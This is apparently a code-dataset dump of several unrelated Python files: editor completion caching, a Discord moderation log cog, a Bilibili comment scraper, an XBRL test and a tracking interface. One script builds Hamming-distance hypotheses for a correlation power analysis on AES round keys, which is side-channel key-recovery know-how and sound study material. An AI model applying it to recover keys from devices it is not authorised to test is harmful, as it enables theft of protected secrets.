completions.\n\n The module files as reported by Jedi are stored with their modification\n times to help detect if a cache needs to be refreshed.\n\n For scoped variables in the buffer, construct a cache key using the\n filename. The buffer file's modification time is checked to see if the\n completion needs to be refreshed. The approximate scope lines are cached\n to help invalidate the cache based on line position.\n\n Cache keys are made using tuples to make them easier to interpret later.\n \"\"\"\n cinput = context['input'].lstrip().lstrip('@')\n if not re.sub(r'[\\s\\d\\.]+', '', cinput):\n return None, []\n filename_hash = hashlib.md5(filename.encode('utf8')).hexdigest()\n line = context['position'][1]\n log.debug('Input: \"%s\"', cinput)\n cache_key = None\n extra_modules = []\n cur_module = os.path.splitext(os.path.basename(filename))[0]\n\n if cinput.startswith(('import ', 'from ')):\n # Cache imports with buffer filename as the key prefix.\n # For `from` imports, the first part of the statement is\n # considered to be the same as `import` for caching.\n\n import_key = 'import~'\n cinput = context['input'].lstrip()\n m = re.search(r'^from\\s+(\\S+)(.*)', cinput)\n if m:\n if m.group(2).lstrip() in 'import':\n cache_key = ('importkeyword~', )\n return cache_key, extra_modules\n import_key = m.group(1) or 'import~'\n elif cinput.startswith('import ') and cinput.rstrip().endswith('.'):\n import_key = re.sub(r'[^\\s\\w\\.]', ' ', cinput.strip()).split()[-1]\n\n if import_key:\n if '.' in import_key and import_key[-1] not in whitespace \\\n and not re.search(r'^from\\s+\\S+\\s+import', cinput):\n # Dot completion on the import line\n import_key, _ = import_key.rsplit('.', 1)\n import_key = import_key.rstrip('.')\n module_file = utils.module_search(\n import_key,\n chain(extra_path,\n [context.get('cwd'), os.path.dirname(filename)],\n utils.rplugin_runtime_paths(context)))\n if module_file:\n cache_key = (import_key, 'local')\n extra_modules.append(module_file)\n elif is_package(import_key):\n cache_key = (import_key, 'package')\n elif not cinput.endswith('.'):\n cache_key = ('import~',)\n else:\n return None, extra_modules\n\n if not cache_key:\n obj = split_module(cinput.strip())\n if obj:\n cache_key = (obj, 'package')\n if obj.startswith('self'):\n if os.path.exists(filename):\n extra_modules.append(filename)\n # `self` is a special case object that needs a scope included\n # in the cache key.\n parents = get_parents(source, line, class_only=True)\n parents.insert(0, cur_module)\n cache_key = (filename_hash, tuple(parents), obj)\n else:\n module_path = full_module(source, obj)\n if module_path and not module_path.startswith('.') \\\n and is_package(module_path):\n cache_key = (module_path, 'package')\n else:\n # A quick scan revealed that the dot completion doesn't\n # involve an imported module. Treat it like a scoped\n # variable and ensure the cache invalidates when the file\n # is saved.\n if os.path.exists(filename):\n extra_modules.append(filename)\n\n module_file = utils.module_search(module_path,\n [os.path.dirname(filename)])\n if module_file:\n cache_key = (module_path, 'local')\n else:\n parents = get_parents(source, line)\n parents.insert(0, cur_module)\n cache_key = (filename_hash, tuple(parents), obj, 'dot')\n elif context.get('complete_str') or cinput.rstrip().endswith('='):\n parents = get_parents(source, line)\n parents.insert(0, cur_module)\n cache_key = (filename_hash, tuple(parents), 'vars')\n if os.path.exists(filename):\n extra_modules.append(filename)\n\n return cache_key, extra_modules\n","sub_path":"rplugin/python3/deoplete/sources/deoplete_jedi/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":15614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"40868571","text":"from nephlib.util import Util\nimport re\n\n\nclass EasyRegex(object):\n\n GRP_NAME_PATTERN = '\\?\\<([^\\>]+)\\>'\n\n def __init__(self):\n pass\n\n @staticmethod\n def parse(pattern, text):\n group_names = EasyRegex._get_regex_group_names(pattern)\n\n rows = []\n for m in re.finditer(EasyRegex._fix_pattern(pattern), text):\n cols = []\n for i, grp_name in enumerate(group_names):\n cols.append(str(m.group(grp_name) or 'null'))\n rows.append(cols)\n\n return rows\n\n @staticmethod\n def _fix_pattern(pattern):\n return pattern.replace('?<', '?P<')\n\n @staticmethod\n def _get_regex_group_names(pattern):\n group_names = []\n for m in re.finditer(EasyRegex.GRP_NAME_PATTERN, pattern):\n group_names.append(m.group(1))\n\n return group_names\n\n\nclass Main(object):\n\n def __init__(self):\n self._pattern = r\"Url:\\s(?[^\\|]*)\\s\\|\\sParam:\\s(?[^{|\\n]+)(?{(messageType='(?[^']+)',\\s)*(message='(?[^']+)',\\s)*(sticky=(?[^,]+),\\s)*(notificationType='(?[^']+)')*[^}]*})*\"\n self._pattern2 = r\"feedCategory='(?[^']+)',\\sfeedType='(?[^']+)'\"\n self._file = 'easy_regex.txt'\n\n def start(self):\n text = Util.load_file('input/{}'.format(self._file))\n for row in EasyRegex.parse(self._pattern, text):\n print('\\t'.join([\n r\n .replace('null', '')\n .replace(' [', '\\t{')\n .replace(']', '}')\n .replace('New', '')\n .replace('http://localhost:12021/nls//event/1002755836/', '')\n for r in row\n ]))\n\n\nif __name__ == '__main__':\n Main().start()\n","sub_path":"Scripts/automation/text_parser/EasyRegex.py","file_name":"EasyRegex.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347618848","text":"import os\nimport pytest\nfrom tests.integration_tests.validation.validation_util import get_test_data\n\n\nCONFORMANCE_SUITE = 'tests/resources/conformance_suites/trr-3.0.1.zip'\nARGS = [\n '--file', os.path.abspath(os.path.join(CONFORMANCE_SUITE, 'testcase.xml')),\n '--formula', 'run',\n '--keepOpen',\n '--testcaseResultsCaptureWarnings',\n '--validate'\n]\n\nif os.getenv('CONFORMANCE_SUITES_TEST_MODE') == 'OFFLINE':\n ARGS.extend(['--internetConnectivity', 'offline'])\n\nTEST_DATA = get_test_data(ARGS)\n\n\n@pytest.mark.parametrize(\"result\", TEST_DATA)\ndef test_xbrl_transformation_registry_3_conformance_suite(result):\n \"\"\"\n Test the XBRL Transformation Registry 3 Conformance Suite\n \"\"\"\n assert result.get('status') == 'pass', \\\n 'Expected these validation suffixes: {}, but received these validations: {}'.format(\n result.get('expected'), result.get('actual')\n )\n","sub_path":"tests/integration_tests/validation/XBRL/test_xbrl_transformation_registry_3_conformance_suite.py","file_name":"test_xbrl_transformation_registry_3_conformance_suite.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426034694","text":"import logging\nfrom datetime import datetime, timedelta\nfrom typing import Optional, Tuple, Union\n\nimport discord\nimport humanize\nfrom discord.ext import commands\nfrom peewee import DoesNotExist\n\nfrom bolt.cogs.infractions.models import Infraction\nfrom bolt.cogs.infractions.types import InfractionType\nfrom bolt.database import objects\nfrom .models import StaffLogChannel\nfrom .util import get_log_channel as fetch_log_channel\n\n\nlog = logging.getLogger(__name__)\n\n\ndef thirty_seconds_ago() -> datetime:\n \"\"\"\n Gives the time 30 seconds ago.\n\n Returns:\n datetime:\n A datetime object representing the\n date and time as they were 30 seconds ago.\n \"\"\"\n\n return datetime.utcnow() - timedelta(seconds=30)\n\n\nclass StaffLog:\n \"\"\"\n Commands that help configuring a staff log.\n Kind of like the audit log, but lasts as long\n as the bot's messages stay there and logs more events.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n log.debug('Loaded Cog StaffLog.')\n\n def __unload(self):\n log.debug('Unloaded Cog StaffLog.')\n\n async def get_log_channel(self, guild: discord.Guild) -> Optional[\n Tuple[\n StaffLogChannel,\n discord.TextChannel\n ]]:\n \"\"\"\n Get the staff log channel for the given Guild ID.\n\n Args:\n guild_id (discord.Guild):\n The guild whose log channel should be returned.\n\n Returns:\n Optional[Tuple[StaffLogChannel, discord.TextChannel]]:\n The channel row and discord Channel if found,\n otherwise, if nothing was found, `None`.\n \"\"\"\n\n channel_obj = await fetch_log_channel(self.bot, guild)\n if channel_obj is not None:\n channel = guild.get_channel(channel_obj.channel_id)\n if channel is None:\n log.debug(\n \"Previously set stafflog channel for guild {guild} ({guild.id}) \"\n \"could not be found anymore, deleting from the database.\"\n )\n await objects.delete(channel_obj)\n return channel_obj, channel\n\n async def log_for(self, guild: discord.Guild, embed: discord.Embed):\n \"\"\"\n Log the given embed in the given guild's staff log channel, if set.\n\n Args:\n guild (discord.Guild):\n The guild to log the event on.\n embed (discord.Embed):\n The embed to send in the staff log channel.\n \"\"\"\n\n result_tuple = await self.get_log_channel(guild)\n if result_tuple is not None:\n channel_row, channel = result_tuple\n if channel_row.enabled and channel is not None:\n await channel.send(embed=embed)\n\n async def on_message_delete(self, message: discord.Message):\n if message.guild is None or message.author == self.bot.user:\n return\n\n info_embed = discord.Embed(\n title=f\"🗑 Message deleted (`{message.id}`)\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_author(\n name=f\"{message.author} ({message.author.id})\",\n icon_url=message.author.avatar_url\n ).add_field(\n name=\"Channel\",\n value=message.channel.mention\n ).add_field(\n name=\"Creation date\",\n value=message.created_at.strftime('%d.%m.%y %H:%M')\n ).add_field(\n name=\"System content\",\n value=message.system_content or \"(no content)\"\n )\n\n if message.attachments:\n info_embed.add_field(\n name=f\"{len(message.attachments)} Attachments\",\n value=', '.join(\n f\"[{attachment.filename}]({attachment.url})\"\n for attachment in message.attachments\n )\n )\n\n await self.log_for(message.guild, info_embed)\n\n async def on_message_edit(self, before: discord.Message, after: discord.Message):\n if after.guild is None or after.author == self.bot.user:\n return\n elif before.content == after.content:\n # It's some other edit that we don't actually care about.\n return\n\n info_embed = discord.Embed(\n title=f\"📝 Message edited (`{after.id}`)\",\n colour=discord.Colour.blue(),\n timestamp=datetime.utcnow()\n ).set_author(\n name=f\"{after.author} ({after.author.id})\",\n icon_url=after.author.avatar_url\n ).add_field(\n name=\"Channel\",\n value=after.channel.mention\n ).add_field(\n name=\"Creation date\",\n value=after.created_at.strftime('%d.%m.%y %H:%M')\n ).add_field(\n name=\"Old content\",\n value=before.content or \"(no content)\"\n ).add_field(\n name=\"Updated content\",\n value=after.content or \"(no content)\"\n )\n\n await self.log_for(after.guild, info_embed)\n\n async def on_member_join(self, member: discord.Member):\n info_embed = discord.Embed(\n title=f\"📥 Member joined\",\n colour=discord.Colour.green(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=member.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{member}` (`{member.id}`)\"\n ).add_field(\n name=\"Account creation\",\n value=f\"{member.created_at.strftime('%d.%m.%y %H:%M')} UTC \"\n f\"({humanize.naturaldelta(datetime.utcnow() - member.created_at)} ago)\"\n )\n\n await self.log_for(member.guild, info_embed)\n\n async def on_member_remove(self, member: discord.Member):\n info_embed = discord.Embed(\n title=f\"📤 Member left\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=member.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{member}` (`{member.id}`)\"\n ).add_field(\n name=\"Joined at\",\n value=f\"{member.joined_at.strftime('%d.%m.%y %H:%M')} UTC \"\n f\"({humanize.naturaldelta(datetime.utcnow() - member.joined_at)} ago)\"\n )\n\n # We can only retrieve more specific information relevant\n # for the infraction database by checking the audit log.\n if member.guild.me.guild_permissions.view_audit_log:\n audit_entry = await member.guild.audit_logs(\n action=discord.AuditLogAction.kick,\n after=thirty_seconds_ago()\n ).find(\n lambda entry: entry.target == member\n )\n if audit_entry is not None:\n await self.handle_member_kick(member, audit_entry)\n else:\n info_embed.set_footer(\n text=\"By giving me the `view audit log` permission, \"\n \"I can check the audit log for a kick.\"\n )\n\n await self.log_for(member.guild, info_embed)\n\n # This is not emitted by discord.py, but emitted through `on_member_remove` if applicable.\n async def handle_member_kick(self, member: discord.Member, audit_entry: discord.AuditLogEntry):\n info_embed = discord.Embed(\n title=\"👢 Member kicked\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=member.avatar_url\n ).add_field(\n name=\"Reason\",\n value=audit_entry.reason or \"*no reason specified*\"\n ).set_footer(\n text=f\"Authored by {audit_entry.user} ({audit_entry.user.id})\",\n icon_url=audit_entry.user.avatar_url\n )\n info_embed.timestamp = audit_entry.created_at\n\n created_infraction = await objects.create(\n Infraction,\n type=InfractionType.kick,\n guild_id=member.guild.id,\n user_id=member.id,\n moderator_id=audit_entry.user.id,\n reason=audit_entry.reason\n )\n\n info_embed.add_field(\n name=\"Infraction\",\n value=f\"created with ID `{created_infraction.id}`\\n\"\n f\"use `infr detail {created_infraction.id}` for details\"\n )\n\n await self.log_for(member.guild, info_embed)\n\n async def on_member_ban(self, guild: discord.Guild, user: Union[discord.Member, discord.User]):\n info_embed = discord.Embed(\n title=f\"🔨 Member banned\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=user.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{user}` (`{user.id}`)\"\n )\n\n if guild.me.guild_permissions.view_audit_log:\n audit_entry = await guild.audit_logs(\n action=discord.AuditLogAction.ban,\n after=thirty_seconds_ago()\n ).find(\n lambda entry: entry.target == user\n )\n if audit_entry is not None:\n info_embed.add_field(\n name=\"Reason\",\n value=audit_entry.reason or \"*no reason specified*\"\n ).set_footer(\n text=f\"Authored by {audit_entry.user} ({audit_entry.user.id})\",\n icon_url=audit_entry.user.avatar_url\n )\n info_embed.timestamp = audit_entry.created_at\n\n created_infraction = await objects.create(\n Infraction,\n type=InfractionType.ban,\n guild_id=guild.id,\n user_id=user.id,\n moderator_id=audit_entry.user.id,\n reason=audit_entry.reason\n )\n info_embed.add_field(\n name=\"Infraction\",\n value=f\"created with ID `{created_infraction.id}`\\n\"\n f\"use `infr detail {created_infraction.id}` for details\"\n )\n\n else:\n info_embed.set_footer(\n text=\"Tried fetching ban information from the \"\n \"audit log, but couldn't find any relevant entry.\"\n )\n else:\n info_embed.set_footer(\n text=\"By giving me the `view audit log` permission, I can give more information.\"\n )\n\n await self.log_for(guild, info_embed)\n\n async def on_member_unban(self, guild: discord.Guild, user: discord.User):\n info_embed = discord.Embed(\n title=f\"🤝 Member unbanned\",\n colour=discord.Colour.blurple(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=user.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{user}` (`{user.id}`)\"\n )\n\n if guild.me.guild_permissions.view_audit_log:\n audit_entry = await guild.audit_logs(\n action=discord.AuditLogAction.unban,\n after=thirty_seconds_ago()\n ).find(\n lambda entry: entry.target == user\n )\n\n if audit_entry is not None:\n info_embed.set_footer(\n text=f\"Authored by {audit_entry.user} ({audit_entry.user.id})\",\n icon_url=audit_entry.user.avatar_url\n )\n info_embed.timestamp = audit_entry.created_at\n else:\n info_embed.set_footer(\n text=\"Tried fetching unban information from the \"\n \"audit log, but couldn't find any relevant entry.\"\n )\n else:\n info_embed.set_footer(\n text=\"By giving me the `view audit log` permission, I can give more information.\"\n )\n\n await self.log_for(guild, info_embed)\n\n @commands.group(name='log', aliases=['stafflog'])\n @commands.has_permissions(manage_messages=True)\n @commands.guild_only()\n async def log_(self, ctx):\n \"\"\"Contains subcommands for managing the staff log.\"\"\"\n\n @log_.command(aliases=['on'])\n async def enable(self, ctx, channel: discord.TextChannel = None):\n \"\"\"\n Enable the stafflog in the given channel.\n\n If a staff log channel was set previously,\n the channel argument may be ommitted.\n \"\"\"\n\n if channel is None:\n try:\n channel_object = await objects.get(\n StaffLogChannel,\n guild_id=ctx.guild.id\n )\n except DoesNotExist:\n error_embed = discord.Embed(\n title=\"Failed to enable log channel\",\n description=(\"There is no staff log channel currently set. \"\n \"Pass one as an argument to this command.\"),\n colour=discord.Colour.red()\n )\n await ctx.send(embed=error_embed)\n else:\n if channel_object.enabled:\n response_embed_title = \"Staff log was already enabled\"\n response_embed_description = (\n \"The log channel is already enabled and the channel \"\n f\"is set to <#{channel_object.channel_id}>.\"\n )\n else:\n channel_object.enabled = True\n await objects.update(channel_object, only=['enabled'])\n\n response_embed_title = \"Staff log is now enabled\"\n response_embed_description = (\n \"Staff logging was successfully enabled \"\n f\"in <#{channel_object.channel_id}>.\"\n )\n\n response_embed = discord.Embed(\n title=response_embed_title,\n description=response_embed_description,\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n\n else:\n channel_object, created = await objects.get_or_create(\n StaffLogChannel,\n guild_id=ctx.guild.id,\n defaults={\n 'channel_id': channel.id,\n 'enabled': True\n }\n )\n if created:\n response_embed = discord.Embed(\n title=\"Staff log is now enabled\",\n description=f\"The logging channel was set to {channel.mention}.\",\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n else:\n channel_object.channel_id = channel.id\n channel_object.enabled = True\n await objects.update(channel_object, only=('channel_id', 'enabled'))\n\n response_embed = discord.Embed(\n title=\"Staff log is now enabled\",\n description=f\"Staff logging was successfully enabled in {channel.mention}\",\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n\n @log_.command(aliases=['off'])\n async def disable(self, ctx):\n \"\"\"\n Disable the staff log on the given guild.\n You can re-enable it at any time by using\n the `enable` command.\n \"\"\"\n\n try:\n channel_object = await objects.get(\n StaffLogChannel,\n guild_id=ctx.guild.id\n )\n except DoesNotExist:\n error_embed = discord.Embed(\n title=\"Failed to disable staff log\",\n description=\"There is no staff log channel set on this guild.\",\n colour=discord.Colour.red()\n )\n await ctx.send(embed=error_embed)\n else:\n if channel_object.enabled:\n channel_object.enabled = False\n await objects.update(channel_object, only=['enabled'])\n\n response_embed = discord.Embed(\n title=\"Successfully disabled staff log\",\n description=\"If you wish to re-enable it, use the `enable` command.\",\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n else:\n error_embed = discord.Embed(\n title=\"Failed to disable staff log\",\n description=\"Staff log is already disabled. Use `enable` to enable it.\",\n colour=discord.Colour.red()\n )\n await ctx.send(embed=error_embed)\n","sub_path":"bolt/cogs/stafflog/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":16728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"126510275","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pyAES.myAES import AES_unroll\nfrom Control.utility import *\nimport numpy as np\nimport pickle\n\naobj = AES_unroll()\nhamming_distance = {}\nintermediate_values = {}\nnum = 0\n\n\ndef cal_hamming(A):\n hamming = []\n a = []\n nine = A.data[9]\n ten = A.data[10]\n for i in range(len(nine)):\n a.append(format(nine[i] ^ ten[i], '08x'))\n for data in a:\n hamming.extend([str(bin(int('0x' + (i+j), 0))).count('1')\n for (i, j) in zip(data[::2], data[1::2])])\n return(hamming)\n\n\n# load cipher text\nwith open('./pkl/cipher.pkl', 'rb') as f:\n cipher = pickle.load(f)\n\n# cipher text loop\nfor ct in cipher:\n # guess_key loop (256)\n for partial_key in range(256):\n key = [partial_key*2**8 + partial_key for l in range(8)]\n aobj.keyExpansion(key)\n # change key of 10R\n aobj.subkey[40:44] = [\n int('0x' + format(partial_key, '02x')*4, 0) for loop in range(4)]\n aobj.decrypt(ct) # decrypt\n if(partial_key == 0):\n cpa_tmp = np.array([cal_hamming(aobj)])\n else:\n cpa_tmp = np.append(cpa_tmp, [cal_hamming(aobj)], axis=0)\n if num == 0:\n cpa = np.array([cpa_tmp])\n else:\n cpa = np.append(cpa, np.array([cpa_tmp]), axis=0)\n num += 1\n print(num)\n\n# list for shft rows\nlis = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]\n\n# write file\nfor num in range(16):\n with open('./pkl/b' + str(num) + '.pkl', mode='wb') as f:\n data = cpa[:, :, lis[num]]\n print(data.shape)\n pickle.dump(data, f)\n","sub_path":"profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473820702","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 21 12:01:25 2020\r\n@author: huzey\r\n\r\n读取Rank List2 产生的csv文件,并下载为txt文件,里面包含time comment两个类别\r\ncsv文件和产生的txt文件在同一文件夹下\r\n程序会自动为不同分区建立子文件夹\r\n使用方法:在标记处直接修改保存地址,运行后就可得到一堆csv文件\r\n!!!请勿随意改动\r\n针对2020.10.16改版之后的新B站排行榜\r\nhttps://www.bilibili.com/v/popular/rank/all\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nimport operator\r\nimport numpy as np\r\n \r\n\r\n# 获取url\r\ndef getHTMLText(url):\r\n try:\r\n # print(\"获取url当中\")\r\n re=requests.get(url,timeout=5000)\r\n re.raise_for_status()\r\n re.encoding=re.apparent_encoding\r\n print(\"获取url完成\")\r\n return re.text\r\n except:\r\n print(\"获取Url失败\")\r\n\r\ndef parsePage(text):\r\n try:\r\n # print(\"解析文本...\")\r\n keyStr = re.findall(r'\"cid\":[\\d]*',text)\r\n # B站有两种寻址方式,一种是API,一种是正则表达式搜索,第二种多一些\r\n if not keyStr:\r\n # 若列表为空,则等于“False”\r\n keyStr = re.findall(r'cid=[\\d]*', text)\r\n key = eval(keyStr[0].split('=')[1])\r\n else:\r\n key = eval(keyStr[0].split(':')[1])\r\n commentUrl = 'https://comment.bilibili.com/' + str(key) + '.xml' \r\n # 弹幕存储地址\r\n # print(\"获取弹幕\")\r\n commentText=getHTMLText(commentUrl)\r\n soup = BeautifulSoup(commentText, \"html.parser\")\r\n # soup2=BeautifulSoup(text,\"html.parser\")\r\n commentList={}\r\n \r\n # find()方法,获取文本,去掉空格\r\n for comment in soup.find_all('d'):\r\n time=float(comment.attrs['p'].split(',')[0])\r\n # tag.attrs(标签属性,字典类型)\r\n commentList[time]=comment.string\r\n newDict=sorted(commentList.items(),key=operator.itemgetter(0))\r\n # 字典排序\r\n commentList=dict(newDict)\r\n print(\"解析文本完成\")\r\n return commentList,key\r\n except:\r\n print(\"解析失败\")\r\n \r\n \r\n \r\ndef float2time(f):\r\n timePlus=int(f)\r\n m=timePlus//60\r\n s=timePlus-m*60\r\n return str(m)+':'+str(s).zfill(2)\r\n \r\ndef ioFunc(commentList,root):\r\n print(\"写入文本中...\")\r\n path = root + '.txt'\r\n print(path)\r\n f = open(path, 'w',encoding='utf-8')\r\n ws = \"{:7}\\t{}\\n\".format('time', 'comment')\r\n f.write(ws)\r\n lastTime=0\r\n for time,string in commentList.items():# 记得items()\r\n lastTime = float2time(time)\r\n ws = \"{:7}\\t{}\\n\".format(lastTime,string)\r\n f.write(ws) \r\n # 手动换行\r\n\r\n\r\n\r\n# 并非要爬取所有内容\r\n# 已经没有月周日排行榜了\r\n# 在这里修改要爬取的分区\r\ntypeItem = ['动画','音乐','舞蹈','游戏','科技','生活','鬼畜','时尚']\r\nimport time \r\nimport re \r\nimport os\r\n\"\"\"在此处修改地址\"\"\"\r\nfilepath = 'D:/bilibili/2020_10_21/'\r\n\r\n\"\"\"一次爬取太多会被B站屏蔽IP,烦死了\"\"\"\r\nfor typetemp in typeItem :# 在这里修改分区 typeItem4 \r\n filename = filepath + str(typetemp) + '.csv'\r\n print(filename)\r\n with open(filename,encoding='utf_8_sig') as file:\r\n BVInfo = pd.read_csv(file)\r\n BVUrl = BVInfo['url']\r\n Title = BVInfo['tittle']\r\n AllTittle=[]\r\n for OneUrl in BVUrl:\r\n # .values 去掉可恶的name,dtype\r\n OneTittle = BVInfo[BVInfo.url== OneUrl]['tittle'].values \r\n # print(\"标题:\",OneTittle,type(OneTittle))\r\n print('网址:',OneUrl,type(OneUrl))\r\n temp_url = re.search(r\"(?<=https://www.bilibili.com/video/)\\S+\",OneUrl).group() # 使用group(num) 或 groups() 匹配对象函数来获取匹配内容。\r\n # print(temp_url)\r\n StrOneTittle = str(OneTittle)\r\n \r\n text=getHTMLText(OneUrl)\r\n \r\n try:\r\n commentList,key=parsePage(text)\r\n except:\r\n print(\"解析跳过\")\r\n # 跳过解析失败的\r\n continue \r\n # 判断是否有文件夹存在,如果没有就创建\r\n DocPath = filepath+str(typetemp)+ '/'\r\n \r\n if not os.path.exists(DocPath):\r\n os.makedirs(DocPath) \r\n print(DocPath)\r\n \r\n \r\n SavePath = DocPath + str(key)\r\n if not os.path.exists( SavePath + '_'+temp_url ):\r\n # 弹幕编号 + BV号\r\n ioFunc(commentList,SavePath +'_'+temp_url)\r\n print(\"Finish.\")\r\n print(\"----Pause---3min----\")\r\n time.sleep(180) #表示秒 爬取一个分区休息3min\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Bullet_Screen2.py","file_name":"Bullet_Screen2.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218467154","text":"from assignment import *\nfrom competence import Competence\n\ndef calculate_minimum(agent_competence, required_competence):\n difference= agent_competence-required_competence\n x = min(difference,0)\n return x\n\ndef calculate_maximum(agent_competence, required_competence):\n difference= agent_competence-required_competence\n x = max(difference,0)\n return x\n\ndef calc_degree_of_undercompetence(assignment):\n total_undercompetence=0\n count=0\n for i in assignment:\n undercompetence = 0\n #for agent in i[1]:\n for comp in i[1].competences:\n if comp.competence == i[0].competence:\n one_agent_undercomp = calculate_minimum(comp.competence_level, i[0].competence_level)\n undercompetence= undercompetence + one_agent_undercomp\n if one_agent_undercomp<0:\n count=count+1\n undercompetence=i[0].importance * abs(undercompetence)#/len(i[1])\n total_undercompetence = total_undercompetence + undercompetence\n #print 'Undercompetence: ', total_undercompetence\n if count > 0:\n return (total_undercompetence) / count\n else:\n return 0\n\ndef calc_degree_of_overcompetence(assignment):\n total_overcompetence=0\n count=0\n for i in assignment:\n overcompetence = 0\n #for agent in i[1]:\n for comp in i[1].competences:\n if comp.competence == i[0].competence:\n one_agent_overcomp = calculate_maximum(comp.competence_level, i[0].competence_level)\n overcompetence= overcompetence + one_agent_overcomp\n if one_agent_overcomp > 0:\n count=count+1\n overcompetence=i[0].importance * overcompetence#/len(i[1])\n total_overcompetence = total_overcompetence + overcompetence\n #print 'Overcompetence: ', total_overcompetence\n if count>0:\n return (total_overcompetence)/count\n else:\n return 0\n\n#penalty_v of undercompetence\ndef calc_fitness(assignment, penalty_v):\n undercomp = calc_degree_of_undercompetence(assignment)\n overcomp= calc_degree_of_overcompetence(assignment)\n return 1-(penalty_v*undercomp + (1-penalty_v)*overcomp)\n\n\ndef calc_non_fitness(assignment, penalty_v):\n undercomp = calc_degree_of_undercompetence(assignment)\n overcomp= calc_degree_of_overcompetence(assignment)\n return penalty_v*undercomp + (1-penalty_v)*overcomp\n","sub_path":"degreeOfFitness.py","file_name":"degreeOfFitness.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"360871106","text":"import cv2\nimport sys\nimport os\nimport imageio\nimport glob\nimport copy\nimport time\nimport numpy as np\n\n\nfrom .MLP import MLP_Detection_MP\nfrom .video import Video\nfrom .matched_filters import MatchedFilter\nfrom .utils import * \nfrom .config import *\n\nclass Interface:\n def __init__(self, init_bbox=None):\n # Set up tracker.\n self.tracker = creat_tracker(tracker_type)\n # Set up Matched Filter\n self.MF = MatchedFilter(KERNEL_PATH)\n # Initialize variables\n self.prev_angle = None\n self.init_bbox = None\n self.frame_num = 0\n\n def init_tracker(self, frame, init_bbox=None):\n \"\"\"\n Initialize tracker given bbox and first frame\n\n Params: \n frame: initial frame\n init_bbox: bounding box\n Return:\n ret: if initialization is successful (boolean)\n \"\"\"\n # Use MLP find init_bbox if init_bbox is none\n \"\"\"\n if init_bbox is None:\n for _ in range(INIT_FRAMES_NUM):\n MLP_Detection_MP(frame, init_detection=True)\n # Read first frame.\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n init_bbox, bs_patch = MLP_Detection_MP(frame, init_detection=False)\n # Stop if both methods failed\n if init_bbox is None:\n raise ValueError(\"Initial Tracking Failed!!!\")\n self.init_bbox = copy.copy(init_bbox)\n\n # Initialize tracker with first frame and bounding box\n return self.tracker.init(frame, init_bbox)\n \"\"\"\n for _ in range(INIT_FRAMES_NUM):\n MLP_Detection_MP(frame, init_detection=True)\n #init_bbox, bs_patch = MLP_Detection_MP(frame, init_detection=False)\n #if init_bbox is None:\n # raise ValueError(\"Initial Tracking Failed!!!\")\n init_bbox=[0,0,51,51]\n self.init_bbox = copy.copy(init_bbox)\n self.tracker.init(frame, init_bbox)\n return\n\n\n\n def update(self, frame, verbose=False):\n \"\"\"\n Compute bbox and angle given current frame\n\n Params:\n frame: current color image \n Return:\n ret: if updating is successful (boolean)\n bbox: bounding bbox\n angle: float value\n center_loc: the center of target [x, y]\n \"\"\"\n # Start timer\n timer = cv2.getTickCount()\n\n # Read a new frame\n self.frame_num += 1\n angle = None\n frame_original = frame.copy() # make a copy for result saving\n \n # Update tracker\n ok, bbox = self.tracker.update(frame)\n # bbox limitation (fixed w and h)\n if ok and (tracker_type == \"KCF\" or bbox[2] * bbox[3] <= 0):\n bbox = list(bbox)\n bbox[2:] = [self.init_bbox[2], self.init_bbox[3]]\n bbox = tuple(bbox)\n\n if ok:\n # Crop patch and analysis using histogram\n ok, bs_patch = cropImageAndAnalysis(frame, bbox)\n\n # Use decision buffer to make final decision.\n ok = pushBuffer(ok)\n \n # Draw bounding box\n if not ok:\n # Tracking failure\n bbox, bs_patch = MLP_Detection_MP(frame, init_detection=False)\n if bbox is None:\n if verbose:\n print(\" !!! -> Tracking Failed! Skip current frame...\")\n self.prev_angle = None\n return False, None, None, None\n\n # Reinitialize tracker\n del self.tracker # release the object space\n self.tracker = creat_tracker(tracker_type)\n self.tracker.init(frame, bbox) \n \n # Apply matched filter to compute the angle of target\n bbox = np.array(bbox).astype(int)\n if bs_patch is not None:\n kernel_angle_idx, center_loc = self.MF.applyFilters(frame_original.copy(), 